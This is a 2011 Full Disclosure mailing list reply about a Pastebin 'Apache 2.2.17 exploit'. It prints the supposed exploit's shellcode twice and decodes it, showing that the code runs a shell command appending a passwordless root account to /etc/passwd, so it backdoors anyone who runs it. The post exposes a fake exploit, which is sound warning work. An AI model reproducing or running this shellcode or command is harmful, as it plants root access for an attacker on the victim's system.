Full Disclosure mailing list archives
Re: Apache 2.2.17 exploit?
From: VeNoMouS <venom () gen-x co nz>
Date: Wed, 05 Oct 2011 15:09:54 +1300
char evil[] = "xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89" "x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89" "x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8" "xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23" "x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74" "x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a" "x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68" "x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64" "x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44" "x44x44" ..... execl("/bin/sh", "sh", "-c", evil, 0); ..... /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd AHUH..... On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:
I regularly trawl
Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find.
Well, seeing as I have no test boxes
at the moment, can someone check this code in a VM? I am not sure if it is legit or not.
http://pastebin.com/ygByEV2e [1] Thanks :)
~Darren
* char evil[] = * "xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89" * "x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89" * "x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8" * "xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23" * "x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74" * "x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a" * "x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68" * "x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64" * "x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44" * "x44x44"; Links: ------ [1] http://pastebin.com/ygByEV2e
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Apache 2.2.17 exploit?, (continued)
- Re: Apache 2.2.17 exploit? Andrew Farmer (Oct 04)
- Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? nix (Oct 03)
- Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? Laurelai (Oct 03)
- Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? Nathaniel Hirsch (Oct 03)
- Re: Apache 2.2.17 exploit? Andrew Farmer (Oct 03)
- Re: Apache 2.2.17 exploit? Guillaume Friloux (Oct 03)
- Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? VeNoMouS (Oct 04)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
- Re: Apache 2.2.17 exploit? adam (Oct 04)
- Re: Apache 2.2.17 exploit? VeNoMouS (Oct 04)
- Re: Apache 2.2.17 exploit? adam (Oct 04)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)